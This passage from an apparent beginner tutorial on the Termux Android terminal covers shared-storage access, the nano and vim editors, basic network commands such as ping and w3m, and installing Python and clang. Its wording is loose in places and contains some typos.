Also, Shared storage as well as external storage is not suitable for installing software. Do not even try to move Termux directories like $HOME or $PREFIX onto this kind of storage.
Access shared and external storage
Then, to access shared and externaacess l storage you need to run termux-setup-storage. You will then be prompted to “Allow Termux access photos, media and files on your device”, which you should allow.
Also, If you have Termux: API application and termux-api package installed, you can use Android file picker to get any file from either shared or external storage by using a utility termux-storage-get.
You must know that, also You can access Termux home directory ($HOME) from the file manager using Storage Access Framework and capable of accessing drives like USB or external SD-card in read-write mode.
Also, use ls to show the directory content, if you want to change the directory. Eg: cd $home. Then, use also pwd to display the path of a file or directory, and use cd/sdcard if you want to access your memory card.
Text Editor – Termux for ethical hacking
Now as we have seen how we can access and manage files on termux, let us see text editor on termux. Also, in my previous article we discussed the differences between termux from Linux, you can have a look at it if you are curious.
Now probably a text editor is a system or program that allows a user to edit text. Also, it is a type of program used for editing plain text files. Here is a list of some text editor on termux.
Nano: is a small and friendly editor. It copies the look and feel of Pico, but is free software, and implements several features that Pico lacks, such as opening multiple files, scrolling per line, undo/redo, syntax coloring, line numbering, and soft-wrapping overlong lines. You can install it using pkg install nano
Vim: Vim is a highly configurable text editor built to make creating and changing any kind of text very efficient. It is included as “vi” with most UNIX systems and with Apple OS X. Also, you can visit the vim Homepage: https://www.vim.org/
Now let discuss a little about networking on termux. Networking is the exchange of information and ideas among people with a common profession or special interest, usually in an informal social setting. Also, Networking often begins with a single point of common ground.
Ifconfig used to check everything related to your Ip address. Also, the command Ping help to check any website ip address. Example: ping “name_of_web_site”, ping www.google.com
Also, Termux gives the possibility of accessing the internet using w3m. Then, the command Pkg install w3m is used to install w3m for accessing the internet on termux. Example: w3m “website address”, w3m tgeniusclub.com
Additionally, the command Pkg install lynx is used to install lynx, but they are having the same functionalities like w3m, type lynx “website”
Installing python in termux
Python is an interpreted, high-level, general-purpose programming language. Created by Guido van Rossum and first released in 1991, Python’s design philosophy emphasizes code readability with its notable use of significant whitespace. Its language constructs and object-oriented approach aim to help programmers write clear, logical code for small and large-scale projects.
when it comes for installing python on termux, there are 2 choices either you install python 3.x or python 2.7.x. Then, let us see different way to install python.
First, to install python 3.x open termux and type Pkg install python. Now, this command will install python 3.x on your termux and will be ready to be used.
Lastly, to install python 2.7.x, open termux, and type Pkg install python2. Now, this command will install python 2.7.x on your termux and will be ready to be used.
Warning: upgrading major/minor versions of the Python package, for example from Python 3.8 to 3.9, will make all your currently installed modules unusable. You will need to reinstall them. However upgrading patch versions, for example from 3.8.1 to 3.8.2, is safe.
The programming language in termux
Termux is often used for software development, and information science education. Also, you might be surprised that almost all languages are usable on termux. Termux is such a powerful Linux environment that can handle the above Programming Languages.
Also, use this command: Pkg install clang it’s used to install c & c++, During installation it will ask you if you allow termux to use same space in your phone hint “y” then enter